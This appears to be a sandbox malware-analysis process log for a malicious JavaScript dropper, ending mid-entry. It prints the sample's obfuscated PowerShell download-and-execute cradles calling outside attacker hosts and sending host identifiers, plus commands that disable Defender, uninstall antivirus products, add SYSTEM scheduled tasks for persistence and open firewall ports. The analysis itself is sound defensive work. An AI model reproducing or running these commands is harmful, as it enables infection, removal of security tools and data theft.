PID 1236 wrote to memory of 1608	1236	cmd.exe	WMIC.exe
PID 1236 wrote to memory of 1608	1236	cmd.exe	WMIC.exe
PID 1976 wrote to memory of 1796	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 1796	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 1796	1976	powershell.exe	cmd.exe
PID 1796 wrote to memory of 1516	1796	cmd.exe	WMIC.exe
PID 1796 wrote to memory of 1516	1796	cmd.exe	WMIC.exe
PID 1796 wrote to memory of 1516	1796	cmd.exe	WMIC.exe
PID 1976 wrote to memory of 1032	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 1032	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 1032	1976	powershell.exe	cmd.exe
PID 1032 wrote to memory of 1920	1032	cmd.exe	WMIC.exe
PID 1032 wrote to memory of 1920	1032	cmd.exe	WMIC.exe
PID 1032 wrote to memory of 1920	1032	cmd.exe	WMIC.exe
PID 1976 wrote to memory of 1812	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 1812	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 1812	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 928	1976	powershell.exe	schtasks.exe
PID 1976 wrote to memory of 928	1976	powershell.exe	schtasks.exe
PID 1976 wrote to memory of 928	1976	powershell.exe	schtasks.exe
PID 1976 wrote to memory of 2084	1976	powershell.exe	schtasks.exe
PID 1976 wrote to memory of 2084	1976	powershell.exe	schtasks.exe
PID 1976 wrote to memory of 2084	1976	powershell.exe	schtasks.exe
PID 1976 wrote to memory of 2256	1976	powershell.exe	schtasks.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\readme.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b notepad C:\Users\Admin\AppData\Local\Temp\readme.js & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*EIDQHRRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
2⤵
- Suspicious use of WriteProcessMemory
PID:1184

C:\Windows\system32\notepad.exe
notepad C:\Users\Admin\AppData\Local\Temp\readme.js
3⤵
- Opens file in notepad (likely ransom note)
PID:1980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*EIDQHRRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo Set-MpPreference -DisableRealtimeMonitoring 1
4⤵
PID:920

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
4⤵
- Suspicious use of WriteProcessMemory
PID:1812

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1904

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
4⤵
- Suspicious use of WriteProcessMemory
PID:272

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1940

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
4⤵
- Suspicious use of WriteProcessMemory
PID:1120

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1320

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
4⤵
- Suspicious use of WriteProcessMemory
PID:1912

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
4⤵
- Suspicious use of WriteProcessMemory
PID:1236

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
5⤵
PID:1608

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
4⤵
- Suspicious use of WriteProcessMemory
PID:1796

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
5⤵
PID:1516

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
4⤵
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
5⤵
PID:1920

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
4⤵
PID:1812

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
4⤵
- Creates scheduled task(s)
PID:928

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \RAyou71hSe /F /tr "powershell -w hidden -c PS_CMD"
4⤵
- Creates scheduled task(s)
PID:2084

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn \RAyou71hSe
4⤵
PID:2256

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn w3zJRG\P7G6p3t /F /tr "powershell -w hidden -c PS_CMD"
4⤵
- Creates scheduled task(s)
PID:3056

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn w3zJRG\P7G6p3t
4⤵
PID:2592

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\IuKU1vQE\m8lB4QK90L /F /tr "powershell -w hidden -c PS_CMD"
4⤵
- Creates scheduled task(s)
PID:2564

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\IuKU1vQE\m8lB4QK90L
4⤵
PID:2664

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c netsh.exe firewall add portopening tcp 65529 SDNSd
4⤵
PID:2932

C:\Windows\system32\netsh.exe
netsh.exe firewall add portopening tcp 65529 SDNSd
5⤵
PID:2948

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
4⤵
PID:2960

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block
4⤵
PID:2064

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block
4⤵
PID:2236

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F
4⤵
PID:2336

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F
4⤵
PID:2744

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F
4⤵
PID:2768

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:2108

C:\Windows\system32\taskeng.exe
taskeng.exe {3C8292FC-D1C9-428B-B0D6-C0720615F4A6} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2640

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|0MSJ3Ad6IVD.exe -
3⤵
- Loads dropped DLL
PID:2012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"
4⤵
PID:2996

C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exe
0MSJ3Ad6IVD.exe -
4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3016

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\j5c31vh0\j5c31vh0.cmdline"
5⤵
PID:2228

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES79B2.tmp" "c:\Windows\Temp\j5c31vh0\CSCAA465576E467457C89EA48149380364.TMP"
6⤵
PID:2268

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\1liziz1t\1liziz1t.cmdline"
5⤵
PID:476

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES8F06.tmp" "c:\Windows\Temp\1liziz1t\CSC55942279109D4A31AFB3C31D8BAF4A54.TMP"
6⤵
PID:2248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
5⤵
PID:2964

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\4grphwgc\4grphwgc.cmdline"
5⤵
PID:2740

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES4470.tmp" "c:\Windows\Temp\4grphwgc\CSCD9F71D3E49E4B70B656791AE788C78.TMP"
6⤵
PID:2024

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|0MSJ3Ad6IVD.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe
3⤵
PID:2968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^|Get-Random -Count 100));test1 -PEBytes $bin"
4⤵
PID:3068

C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exe
0MSJ3Ad6IVD.exe -
4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1536

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|0MSJ3Ad6IVD.exe -
3⤵
PID:3036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"
4⤵
PID:3060

C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exe
0MSJ3Ad6IVD.exe -
4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2084

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\yadmwoyb\yadmwoyb.cmdline"
5⤵
PID:2680

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES158.tmp" "c:\Windows\Temp\yadmwoyb\CSCACE8DAE934C442BE8B6F9F04EE5AD75.TMP"
6⤵
PID:2832

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config xWinWpdSrv Start= Disabled
5⤵
PID:964

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop xWinWpdSrv
5⤵
PID:2000

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete xWinWpdSrv
5⤵
PID:2820

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config SVSHost Start= Disabled
5⤵
PID:2908

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop SVSHost
5⤵
PID:1032

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete SVSHost
5⤵
PID:440

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config "Microsoft Telemetry" Start= Disabled
5⤵
PID:2828

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop "Microsoft Telemetry"
5⤵
PID:2256

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete "Microsoft Telemetry"
5⤵
PID:2384

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config lsass Start= Disabled
5⤵
PID:2344

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop lsass
5⤵
PID:2516

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete lsass
5⤵
PID:2372

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Microsoft Start= Disabled
5⤵
PID:2584

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Microsoft
5⤵
PID:1964

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Microsoft
5⤵
PID:2544

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config system Start= Disabled
5⤵
PID:2416

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop system
5⤵
PID:2340

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete system
5⤵
PID:2620

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Oracleupdate Start= Disabled
5⤵
PID:2624

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Oracleupdate
5⤵
PID:2396

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Oracleupdate
5⤵
PID:2612

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config CLR Start= Disabled
5⤵
PID:2708

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop CLR
5⤵
PID:2684

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete CLR
5⤵
PID:2848

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config sysmgt Start= Disabled
5⤵
PID:1644

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop sysmgt
5⤵
PID:2792

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete sysmgt
5⤵
PID:2940

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config \gm Start= Disabled
5⤵
PID:2936

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop \gm
5⤵
PID:3004

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete \gm
5⤵
PID:1580

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WmdnPnSN Start= Disabled
5⤵
PID:1936

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WmdnPnSN
5⤵
PID:2736

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WmdnPnSN
5⤵
PID:2752

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Sougoudl Start= Disabled
5⤵
PID:2744

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Sougoudl
5⤵
PID:2308

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Sougoudl
5⤵
PID:1892

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config National Start= Disabled
5⤵
PID:2872

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop National
5⤵
PID:800

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete National
5⤵
PID:1076

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Nationaaal Start= Disabled
5⤵
PID:1548

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Nationaaal
5⤵
PID:2780

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Nationaaal
5⤵
PID:852

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Natimmonal Start= Disabled
5⤵
PID:1736

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Natimmonal
5⤵
PID:1628

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Natimmonal
5⤵
PID:1188

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Nationaloll Start= Disabled
5⤵
PID:1448

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Nationaloll
5⤵
PID:2836

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Nationaloll
5⤵
PID:2408

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Nationalmll Start= Disabled
5⤵
PID:2532

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Nationalmll
5⤵
PID:1236

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Nationalmll
5⤵
PID:2664

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Nationalaie Start= Disabled
5⤵
PID:2764

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Nationalaie
5⤵
PID:2564

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Nationalaie
5⤵
PID:1832

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Nationalwpi Start= Disabled
5⤵
PID:1244

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Nationalwpi
5⤵
PID:2324

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Nationalwpi
5⤵
PID:884

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WinHelp32 Start= Disabled
5⤵
PID:2676

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WinHelp32
5⤵
PID:2920

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WinHelp32
5⤵
PID:2916

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WinHelp64 Start= Disabled
5⤵
PID:2964

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WinHelp64
5⤵
PID:1692

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WinHelp64
5⤵
PID:1112

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Samserver Start= Disabled
5⤵
PID:2296

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Samserver
5⤵
PID:1328

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Samserver
5⤵
PID:844

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config RpcEptManger Start= Disabled
5⤵
PID:2336

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop RpcEptManger
5⤵
PID:2248

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete RpcEptManger
5⤵
PID:1732

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config "NetMsmqActiv Media NVIDIA" Start= Disabled
5⤵
PID:552

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop "NetMsmqActiv Media NVIDIA"
5⤵
PID:2860

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete "NetMsmqActiv Media NVIDIA"
5⤵
PID:1972

C:\Windows\system32\sc.exe
